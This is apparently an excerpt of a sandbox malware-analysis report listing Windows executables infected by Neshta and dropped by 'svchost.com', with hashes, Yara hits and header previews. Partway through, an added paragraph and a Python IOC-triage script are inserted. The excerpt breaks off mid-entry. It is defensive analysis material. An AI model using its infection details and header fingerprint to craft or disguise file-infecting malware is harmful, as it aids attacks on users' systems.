                                                                                                                        SHA-256:2CAAF2C35A46F53327B11B7EE33B34E1DB112D5C83798BC1B1FEB11A7DD38DD1
                                                                                                                        SHA-512:61A5207DAFC38941A87EBB47B835F212C4D4581F2E3EBE5FE2AEAA7E1D51221DD1805176B0925967B4934754092B364A1A40DEEB778E6817B6BAEC533B367D1A
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.5964179831347325
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC3GoO5OLmk1uFQfI5367Kd8:sr85Cnm5Wi3h8
                                                                                                                        MD5:49108FC1C6FF24CD49C200E2D7A44B86
                                                                                                                        SHA1:E79038C6363781BF92D4487BD77A4A770352E948
                                                                                                                        SHA-256:06197B71B98A7C4FC08B2B354B6B5DE011BA11CF958827BEE3438B170A27F17F
                                                                                                                        SHA-512:008A7A84B3BC2337AF59260348076CDEE1F3C507AD2BF4D2C567029E1F12594555D2BDC4B9BEB2AE77B29E07F7F02158806DB196BB1878D9018E34E7A7757FA1
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.653521772684421
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC/rmKEs2WzzIR++tGuPkNoAvBFbq6DAcBDjFsb:sr85C/qLWos+tGEkBbq6D3Bdsb
                                                                                                                        MD5:50B7F8BD51D8BEA4542C8B6FB7046568
                                                                                                                        SHA1:46FE9571A136EEDD3DC35089F096D47B32EA74C8
                                                                                                                        SHA-256:86A782FF58F3B5F1736EF23051833E340FD56A77C1EDDDBA8ECC5A507BA47EE0
                                                                                                                        SHA-512:87A46E55F78299DA53343B832D84C81C230D46AEFB71C603998DA5F6D0BB3FFE6FDA5F825F5731F7B810E21C1EF8E9812278D07E7402BB3913AF6DD66DD43CE1
                                                                                                                        Malicious:true
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.330325009255707
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC/rmKMmG2haDkdWIJ7OkUVS:sr85C/qzE+bgOkIS
                                                                                                                        MD5:47848F50CD963815CF2894B7C284095C
                                                                                                                        SHA1:8F8E03058352E172E9158782BC8E315D026CD720
                                                                                                                        SHA-256:115C7F82BED3C1779F50CE53273248152587D8F9421B933C10534B84E16E7815
                                                                                                                        SHA-512:9D692E732A6E0F673A2A4ACC6E7877976FCB2901A874D696ADF2A16EB55C08AB738744811AC9A6AFD5673F2FE272E2C6663B6EB123049F41FA5C1E68EBCD5A8E
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.656070779362061
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC/rmKKKajo+iKndnTdkCE1A6n82c6jbs2:sr85C/qo0o+iwdnP6ngIs2
                                                                                                                        MD5:60628C314BCF2A97CCFA9CB4241A2DAB
                                                                                                                        SHA1:6EF748A1568A9AE0D541C5CDF0F74430A59E4DE5
                                                                                                                        SHA-256:FD8BD222DB055C39D6050A10F91EEE576ADDFC37CE78F585ACC48F96E222FA90
                                                                                                                        SHA-512:2AC9ED50008A13A4255ABB338C675D53688D321E6086B6DF17B02A3F89896051F60E8565001CE0B7BCEBD0CD211DED9B9574347BC95A05922700C20806EC93EC
                                                                                                                        Malicious:true
Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaws.exe
Process:C:\Windows\svchost.com
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):82944
Entropy (8bit):6.6397427450636055
Encrypted:false
SSDEEP:1536:JxqjQ+P04wsmJC/rmKHLgwHz2xi03XxQy012eqZwE:sr85C/qMsc2Y03BQz2eqZP
MD5:7132D6785E73B1159F3AC9AC5DE71A1C
SHA1:0EF8C262E63E3776662064D00E5C4264D0213C8B
SHA-256:629945249C52DDB4108FF5C239D4E2C79C92A545ECD25DAE395697831D648A5F
SHA-512:804BD2E14C52D226F1D470D0C73B3DE7945EA24EA4554D916FF796E24F6C7C6B5A21284396C6359CBD94ACCE87517D19984F207FEED537AE9DDE8C29D04D2A9E
Malicious:true
Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe
Process:C:\Windows\svchost.com
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):82944
Entropy (8bit):6.346606571165856
Encrypted:false
SSDEEP:1536:JxqjQ+P04wsmJCOLIFaIz9SEhJyurf6S1TWfavAd3VbB:sr85Cb7hfFTkd33
MD5:95ED8DD6C4D471F68911840679CA1F9B
SHA1:5BDD0A4778F72B6AC95FEEFF108F74E342981690
SHA-256:82B98FAF27483CB4C8957A2BC6306C47D59559046C8DCDC03C708C77C36E2417
SHA-512:581BD049EDCEC4E330FEC670AF7B2980F1B338FC8588B596555803A43B0BE4232A3376CB314C8F3C9DC615D892D80746EB2E1C60766BDB7E046515DB9751DD8B
Malicious:true
Yara Hits:
• Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe, Author: Florian Roth
Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe
Process:C:\Windows\svchost.com
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):82944
Entropy (8bit):6.107296013528715
Encrypted:false
SSDEEP:1536:JxqjQ+P04wsmJCWnoDdvhQBW1kqanjaYt6Zs8:sr85CaEQQhanIZs8
MD5:4141A0DE0BCBE19FA9E93DB323462679
SHA1:88F7E506A247D882C4F4E924D1E3DAB0FC077387
SHA-256:3CD849C610540723B3785865DFCC8F65B820003251B39ED6594A8A979F20E948
SHA-512:940ED87A4C20AE138D388D2324AEBCCA2FC4C93B8D8C2443E91EB382937F79B55BDAD03F595C4EF3FA94D0EC087EA3C228ABB143BBCB79C554E5C3FA38CAA754
Malicious:true
Yara Hits:
• Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe, Author: Florian Roth
Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exe
Process:C:\Windows\svchost.com
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):82944
Entropy (8bit):6.242980084696127
Encrypted:false
SSDEEP:1536:JxqjQ+P04wsmJCZqO55PvVT4zHu+wLZ8qU:sr85CIO55PvV8HVwLZ8qU
MD5:18E80CD6901FFDEDD81B44D0526240D4
SHA1:640A66FC69235A0B3677A010376FC607CC2B50E6
SHA-256:3A70FBA9C369E6FC2DB35AF45D1201833ADEB33B1ACE24603A582D2BACE6ACDF
SHA-512:4F62E2168BFCFD0329F12F93FB5783B9D70989852CF9C12339FDED1ACC5C984FCC847555DD223C6EE2C3CEF64DD95F580DB31138F9D2F47E68FF2F6106A3BED3
Malicious:true
Yara Hits:
• Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exe, Author: Florian Roth
Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exe
Process:C:\Windows\svchost.com
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):82944
Entropy (8bit):6.2705620011183765
Encrypted:false
SSDEEP:1536:JxqjQ+P04wsmJCFtwbWR/v1o/G42UR9whwRrcUTR9EhhBhc:sr85CpnD9UR9whwtvTRMBy
MD5:F56F560D473A7660D3AD44E731930A06
SHA1:B71090C328FF4234B213D76689591DE15DEBD0F3
SHA-256:9B7384DC0D5DBA8C5161DB5C42D3075A4281716F741F10DEF974C5C680308CD0
SHA-512:0134B6C093C053343177A83B81A23EEE54BF4C655958906B854B221B85097D633FA96953B83343F6C207BE5A15919017EA26C05DD3B46193618FC26510C6E74F
Malicious:true
Yara Hits:
• Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exe, Author: Florian Roth
Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE
Process:C:\Windows\svchost.com
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):82944
Entropy (8bit):5.110851138659397
Encrypted:false
SSDEEP:1536:JxqjQ+P04wsmJCIbgvgvwvEvFvwYF57LoW8dwhFz7Oos8iwiFT7XMvNvev0vUvZo:sr85CIbMMc4ZTTfRyKFifVlt7wx+oIVg
MD5:4DA76295D7246E94AC917F192A2ACE84
SHA1:58964579A019BEAB01488F1B1FD0A83C4A38B0CB
SHA-256:D1D94327BEFFD6F453E862BFE9B715C980B20F33F38C8825AA2B2DF1DF33F9A5
SHA-512:8811B0CC2BDE08B9354AC1F84F441F7E3D11A31D7E5D25139E53DA4C2C2E99645A1F37FAA7FD043B4FCC1169DB59FF4F7BA8EAC9CAC14CD455B3CCD34B6BAAD2
Malicious:true
Yara Hits:
• Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE, Author: Florian Roth
Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe
Process:C:\Windows\svchost.com
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):82944
Entropy (8bit):6.46960810763993
Encrypted:false
SSDEEP:1536:JxqjQ+P04wsmJCwMkBExFhpgLTGlrFBbeEOCr:sr85CJ7uTGlr3iE5r
MD5:3AE73C8D42CF093E893717A04A20D5F8
SHA1:96384CCD613D795E953BFD876250C86007EF74D6
SHA-256:BAE7AFCEBAEF2A3BB243EFAF1305AED127D21B978D7C4335109F2A403A4C2CE1
SHA-512:C90A74241A93652AB10BD6E1D476D89C995C7749938B83877C14A8F9496959C8868F21239DC6C468629852D154621E310CA76FB4C50DF8C02626560D48F96E07
Malicious:true
Yara Hits:
• Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe, Author: Florian Roth
Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXE
Process:C:\Windows\svchost.com
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):82944
Entropy (8bit):6.448388258977007
Encrypted:false
SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJZyKcXJKtm61b0fth1uvh/NYANLOT9j/:JxqjQ+P04wsmJCRXJQm62t+vTaT9jxd7
MD5:8BA32D4C4C59A22D2A5A1BEAB8B004C7
SHA1:AA91417C5BA67F09E743A7740662EED65C4873EA
SHA-256:2B0E0FBC461BED861EAF961F5058A18252A8A517008660D46063A1DCDF10DD02
SHA-512:07B9A4827EFDE249FBD6953ABE3559A589500534E8DBAFF12C65EAD40FDE51395822BD265AE48D271ECB825BF6EDEC3D7CB7D2D96FFCBB3AA167FF7FC1A64AF4
Malicious:true
Yara Hits:
• Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXE, Author: Florian Roth
Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE
Process:C:\Windows\svchost.com
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):82944
Entropy (8bit):6.285196024262785
Encrypted:false
SSDEEP:1536:JxqjQ+P04wsmJCVJQEW8SSfaU/VEwdwzfnuktR9KJMkW:sr85CbQE2SkXFKJMt
MD5:2355BC5DCE8E63203BD523F6A3EF11C9
SHA1:06E09B957EC99F2635D39BD9D3EF6FB8C26FDD8F
SHA-256:37D5B62049B2ECBAC53E3126E68E2FA0416A2E220C97E9951BD71FFF52E514A9
SHA-512:71BCE642EDC4355E8CD217442EE6AEB1AA536069FAACA69633EF3B508A6E523FA2386A7EF841FC84F9EAF475725368DCC2CED0C0D4C13B170EE789A69FFDDCD7
Malicious:true
Yara Hits:
• Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE, Author: Florian Roth
Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
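Every infected file in the table above shares the same pattern: it was written by C:\Windows\svchost.com into a Program Files directory, it is exactly 82944 bytes, and its Preview shows the same header (an MZ header whose third byte is "P", the stub text "This program must be run under Win32", and a section table beginning CODE/DATA/BSS), which is the layout a Borland/Delphi linker produces. Differing hashes and entropies show that the appended host payload differs while the leading stub is constant. The following triage helper is an added example, not code from the sandbox report or from the malware; it uses only the Python 3 standard library. REPORT_SHA256 copies the SHA-256 values listed above, build_sample() constructs a minimal PE image that only reproduces that header layout as offline test input (it is not an infected file), and the function names triage(), scan_tree() and the others are this example's own. The structural check is a lead, not a verdict: any legitimately Delphi-built program has the same MZP header and section names, so only a hash match (or the Yara rule cited in the table) confirms infection.

```python
import hashlib
import os
import struct

# SHA-256 values copied from the report's dropped-file table (all 82944 bytes).
REPORT_SHA256 = {
    "629945249C52DDB4108FF5C239D4E2C79C92A545ECD25DAE395697831D648A5F",  # javaws.exe
    "82B98FAF27483CB4C8957A2BC6306C47D59559046C8DCDC03C708C77C36E2417",  # jp2launcher.exe
    "3CD849C610540723B3785865DFCC8F65B820003251B39ED6594A8A979F20E948",  # ssvagent.exe
    "3A70FBA9C369E6FC2DB35AF45D1201833ADEB33B1ACE24603A582D2BACE6ACDF",  # unpack200.exe
    "9B7384DC0D5DBA8C5161DB5C42D3075A4281716F741F10DEF974C5C680308CD0",  # SQLDumper.exe
    "D1D94327BEFFD6F453E862BFE9B715C980B20F33F38C8825AA2B2DF1DF33F9A5",  # ACCICONS.EXE
    "BAE7AFCEBAEF2A3BB243EFAF1305AED127D21B978D7C4335109F2A403A4C2CE1",  # AppSharingHookController.exe
    "2B0E0FBC461BED861EAF961F5058A18252A8A517008660D46063A1DCDF10DD02",  # CLVIEW.EXE
    "37D5B62049B2ECBAC53E3126E68E2FA0416A2E220C97E9951BD71FFF52E514A9",  # CNFNOT32.EXE
    "29F10DE4B67C8BF585A581AE8893069FA52214A18CC4444D3E207A7A657EBD02",  # DATABASECOMPARE.EXE
}
REPORT_SIZE = 82944  # size of every infected file in the table; a hint only

# Header traits visible in every Preview field (Borland/Delphi linker output).
BORLAND_STUB = b"This program must be run under Win32"
BORLAND_SECTIONS = ["CODE", "DATA", "BSS", ".idata", ".tls", ".rdata", ".reloc", ".rsrc"]


def hash_bytes(data):
    """Compute the four digests the report lists, upper-case hex like the table."""
    return {
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
        "SHA-512": hashlib.sha512(data).hexdigest().upper(),
    }


def section_names(data):
    """Return PE section names in table order, or [] if there is no valid PE header."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return []
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]          # e_lfanew
    if pe_off + 24 > len(data) or data[pe_off:pe_off + 4] != b"PE\0\0":
        return []
    n_sections = struct.unpack_from("<H", data, pe_off + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe_off + 20)[0]  # SizeOfOptionalHeader
    table = pe_off + 24 + opt_size                              # first IMAGE_SECTION_HEADER
    names = []
    for i in range(n_sections):
        entry = table + 40 * i
        if entry + 40 > len(data):
            break
        names.append(data[entry:entry + 8].rstrip(b"\0").decode("ascii", "replace"))
    return names


def borland_fingerprint(data):
    """True if the file carries the MZP / Win32-stub / CODE,DATA,BSS layout seen in the Previews.
    This matches any Delphi-built binary, so it is a lead for hashing, not proof of infection."""
    return (
        data[:3] == b"MZP"
        and BORLAND_STUB in data[:0x80]
        and section_names(data)[:3] == BORLAND_SECTIONS[:3]
    )


def triage(data):
    """Combine the hash IOC match with the structural and size hints for one file's bytes."""
    hashes = hash_bytes(data)
    return {
        "hashes": hashes,
        "ioc_hash_match": hashes["SHA-256"] in REPORT_SHA256,
        "size_matches_report": len(data) == REPORT_SIZE,
        "borland_fingerprint": borland_fingerprint(data),
        "sections": section_names(data),
    }


def scan_tree(root):
    """Walk a directory such as C:\\Program Files (x86) and return (path, triage) for .exe
    files that hash-match the report or carry the Borland fingerprint."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".exe"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read()
            except OSError:
                continue
            result = triage(data)
            if result["ioc_hash_match"] or result["borland_fingerprint"]:
                hits.append((path, result))
    return hits


def build_sample():
    """Constructed test input: a minimal PE32 image with the same header layout as the
    Preview fields (MZP, Borland stub text, eight Borland-named sections). Not malware."""
    pe_off = 0x100
    hdr = bytearray(pe_off)
    hdr[0:3] = b"MZP"
    struct.pack_into("<I", hdr, 0x3C, pe_off)
    hdr[0x4E:0x4E + len(BORLAND_STUB)] = BORLAND_STUB
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)  # PE32 optional-header magic
    coff = struct.pack("<HHIIIHH", 0x14C, len(BORLAND_SECTIONS), 0, 0, 0, len(opt), 0x818F)
    sections = b"".join(n.encode().ljust(8, b"\0") + b"\0" * 32 for n in BORLAND_SECTIONS)
    return bytes(hdr) + b"PE\0\0" + coff + bytes(opt) + sections


if __name__ == "__main__":
    print(triage(build_sample()))
```

On a live host, run scan_tree() against each Program Files root and treat ioc_hash_match as confirmation; for borland_fingerprint-only hits, submit the file to the Yara rule named in the table before quarantining, since Delphi-built software is common and will trip the structural check on its own.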
C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE
Process:C:\Windows\svchost.com
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):82944
Entropy (8bit):6.72011826313205
Encrypted:false
SSDEEP:1536:JxqjQ+P04wsmJCa9IKr1BRo+SYZMuIb3eJG53B:sr85CaDr1BRo+SYZMuW32GhB
MD5:BD61FF1B20A7530ECF797894EE1316DC
SHA1:A9601D8B56C247B801E5D5A89377EEFA6FF37FA2
SHA-256:29F10DE4B67C8BF585A581AE8893069FA52214A18CC4444D3E207A7A657EBD02
SHA-512:CD91235FF8ACC7D8263EF05028E728E0BBA90D9459B3FD86568C7149DFF55F1E3E010C5234C234DA87B2CBFBE7B8C71DFEDD9E8C5BB326146579CA9EAD90055F
Malicious:true
Yara Hits:
• Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.169493808225336
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCslMDFepJnQxbMwwNOhO8WSnWR0Oj:sr85CsaeYyiL7WR0k
                                                                                                                        MD5:8F4A79DC0DD71E8CA092D84C0260F92D
                                                                                                                        SHA1:CEB13BACFAE68CFE94561487FC6E0AE0464C6A58
                                                                                                                        SHA-256:2480D138EE436D182337435EF36F9A895ED9A98DA620C752976D575C08ECD390
                                                                                                                        SHA-512:A100A527B654FE476672B7809A4C73F8C523C2620815476CF8D994E1553A344CFE4191FDF8641719D52B29743D625574A9287EF51BBF343B5D8FDD428FE68D33
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.3186383734960625
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCDnCgs1pSd8MvYMRLWjqov/M:sr85CD+4DFLWjlXM
                                                                                                                        MD5:B4F5C898517A6B40402611BF65397423
                                                                                                                        SHA1:F6E1F64CA7C05131682153B67E5EF5C54533F1DE
                                                                                                                        SHA-256:E634A7EECA5A30B359DD622BA3A3BDBF5729173A416C86C962647B2B7A1F286C
                                                                                                                        SHA-512:C510990B72E1FCD1007B38B0A9F4A28280E909D2AC81AE08F106EC482423927EE13081B89DA316D44EDC6FF684C3C3FB93E898705D6D7E7640612560C494E5CA
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exe, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.392056642854633
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCjCTi/Y5cIzwdi9Jo5wJ8RNjRmBF2XFAkrfkGj:sr85CGT/5Lz8RNIBAXFdrtj
                                                                                                                        MD5:77E4E96AC817B6D2DCC671C75B3AF7D5
                                                                                                                        SHA1:2B3C254A156F9CD60BD9EF5B5832C7BC8F7FF9E2
                                                                                                                        SHA-256:657B05CB38BED57B93383818722F9058FED9966D1CDA1AB5A00034CB0F6E9A0B
                                                                                                                        SHA-512:F4F835B4004C5BF7C7ECB7DF6179EEF8DDDF277B13609A4ABE5AF4A748AD27A6207020E6A9E5301C89C0FF689CFCD99234245BB621CCC94A3E2A9B930DA63B0F
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXE, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.496755886640026
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCJ5SSe4emv59S7OJvwgUQn73bPrI3SZ:sr85CJte4eK58i6gUQ7LL
                                                                                                                        MD5:C5ECA751B54F507CCB797556E24D9EDA
                                                                                                                        SHA1:30949D80A7FC4778ACCD14FA9A35B3910F0C96D2
